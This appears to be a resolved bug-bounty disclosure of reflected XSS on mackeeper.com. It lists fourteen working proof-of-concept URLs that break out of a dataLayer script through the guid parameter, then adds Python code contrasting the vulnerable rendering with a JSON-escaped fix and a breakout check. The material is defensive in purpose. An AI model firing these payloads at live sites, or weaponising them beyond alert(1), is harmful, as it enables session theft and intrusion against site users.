Multiple Links Vulnerable to Reflected XSS
Team Summary
Official summary from Clario
### Summary

Multiple links are vulnerable to reflected XSS under `https://mackeeper.com/mk/de/`.

### Steps to reproduce

Go to these links and the XSS will be triggered:

```
https://mackeeper.com/mk/de/adware-removal/?affid=596d6f80-eb86-11e9-84e4-a2e51eb97200-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=59ead2d9-eb86-11e9-959a-0242ac110002/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><>
https://mackeeper.com/mk/de/anti-malware-lab/?affid=1ab6d400-ebdd-11e9-a756-f5850ae9fc00-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=1b146bfe-ebdd-11e9-8128-0242ac110004/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><>
https://mackeeper.com/mk/de/duplicates-finder/?affid=d4458300-eba4-11e9-92e9-aa39ddcd0c00-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=d4d98772-eba4-11e9-959a-0242ac110002/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><>
https://mackeeper.com/mk/de/eula-mk3/?affid=c4d36280-d8a2-11e9-afb9-22d3643f1600-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=c537a9a0-d8a2-11e9-959a-0242ac110002/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><>
https://mackeeper.com/mk/de/internet-security/?affid=8fd9d780-ebe4-11e9-96e4-3e714f5bd500-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=903b0f74-ebe4-11e9-8128-0242ac110004/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><>
https://mackeeper.com/mk/de/mac-antivirus/?affid=30e57580-eb86-11e9-91a9-c99b14b02b00-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=316b9437-eb86-11e9-959a-0242ac110002/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><>
https://mackeeper.com/mk/de/mac-uninstaller/?affid=47022e80-eba4-11e9-a836-8844e67acf00-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=474685d3-eba4-11e9-959a-0242ac110002/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><>
https://mackeeper.com/mk/de/partners?affid=c4d8fa00-d47f-11e9-bb31-4ca249ec8a00-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=053b5eb3-d78a-11e9-959a-0242ac110002xxxxxxxx",});</script>%0a<script>alert(1)</script>>><>>&utm_medium=buynow/xxxxxxxx'"><>
https://mackeeper.com/mk/de/refund/?affid=6c03ca00-d8a2-11e9-9fe9-faafdda89700-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=6c21ebb7-d8a2-11e9-8128-0242ac110004/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><>
https://mackeeper.com/mk/de/remote_support/?affid=42956f00-d89f-11e9-a3e5-e8859fb1d300-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=42fbf9aa-d89f-11e9-8128-0242ac110004/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><>
https://mackeeper.com/mk/de/remove-ads/?affid=7db89200-d8e1-11e9-9714-51ff6fb49400-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=7e0d842b-d8e1-11e9-8128-0242ac110004/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><>
https://mackeeper.com/mk/de/track-my-mac/?affid=5a060600-eb86-11e9-9191-bb7558fcf700-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=5a7f3ae2-eb86-11e9-8128-0242ac110004/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><>
https://mackeeper.com/mk/de/uninstall_mackeeper/?affid=26ece880-dc52-11e9-b6ef-24b4d9113900-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=274ef1ca-dc52-11e9-8128-0242ac110004/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><>
https://mackeeper.com/mk/es/adware-removal/?affid=596d6f80-eb86-11e9-84e4-a2e51eb97200-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=59ead2d9-eb86-11e9-959a-0242ac110002/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><>
```

If the XSS is not triggered, try Burp Suite to view the source code; sometimes the CSP blocks `alert`. Alternatively, you can use IE 11.

Reflected source:

```
<script>
var dataLayer = dataLayer || window.dataLayer || [];
dataLayer.push({
  "pageType": "AllPages",
  "userId": "7e0d842b-d8e1-11e9-8128-0242ac110004/xxxxxxxx",});</script> <script>alert(1)</script>>><>",
  "touchPoint": "web",
  "country": "PK",
  "affid": "145.14736301.1408462723.2.mzb"
});
</script>
```
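The reflected source above shows the `guid` query value dropped, quoted but unescaped, into a JavaScript string inside `dataLayer.push`, so a value containing `",});</script>` closes the string, the object literal and the whole script element. As an added example (not Clario's code; the template, function names and sample value are constructed), here is that pattern beside a hardened render that JSON-encodes the value and escapes `<`, `>` and `&`, plus a check that counts `</script>` closes in the output:

```python
import json

# Constructed sample value with the same shape as the report's guid parameter: the GUID
# replaced by a placeholder and the %0a already URL-decoded to a newline.
SAMPLE_GUID = 'PLACEHOLDER-GUID/xxxxxxxx",});</script>\n<script>alert(1)</script>>><>'

# Hypothetical server template mirroring the reflected dataLayer.push block.
TEMPLATE = (
    '<script>\n'
    'var dataLayer = dataLayer || window.dataLayer || [];\n'
    'dataLayer.push({{\n'
    '  "pageType": "AllPages",\n'
    '  "userId": {user_id},\n'
    '  "touchPoint": "web"\n'
    '}});\n'
    '</script>'
)

def render_datalayer_unsafe(guid: str) -> str:
    """Vulnerable pattern: quote the raw query value and drop it into the script."""
    return TEMPLATE.format(user_id='"' + guid + '"')

def js_string_literal(value: str) -> str:
    """Encode a value for a JS string context inside an HTML <script> element.
    json.dumps handles quotes, backslashes, control characters and (default
    ensure_ascii=True) U+2028/U+2029. The HTML parser ignores JS escapes, so a
    '</script>' in the string would still end the element; '<', '>' and '&' are
    therefore turned into JS unicode escapes, which the JS engine decodes back."""
    encoded = json.dumps(value)
    return (encoded.replace('<', '\\u003c')
                   .replace('>', '\\u003e')
                   .replace('&', '\\u0026'))

def render_datalayer_safe(guid: str) -> str:
    """Hardened pattern: the value can only ever be a string inside the object literal."""
    return TEMPLATE.format(user_id=js_string_literal(guid))

def roundtrips(value: str) -> bool:
    """The encoding loses nothing: decoding the literal gives the original value back."""
    return json.loads(js_string_literal(value)) == value

def script_breakout(html: str) -> bool:
    """Detection check: more than the one intended </script> means the value escaped."""
    return html.lower().count('</script>') > 1

if __name__ == '__main__':
    print('unsafe render breaks out:', script_breakout(render_datalayer_unsafe(SAMPLE_GUID)))
    print('safe render breaks out:  ', script_breakout(render_datalayer_safe(SAMPLE_GUID)))
```

The report notes that CSP sometimes blocked `alert`; CSP only limits what injected script can do, while the encoding fix removes the injection itself.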
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$50.00
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected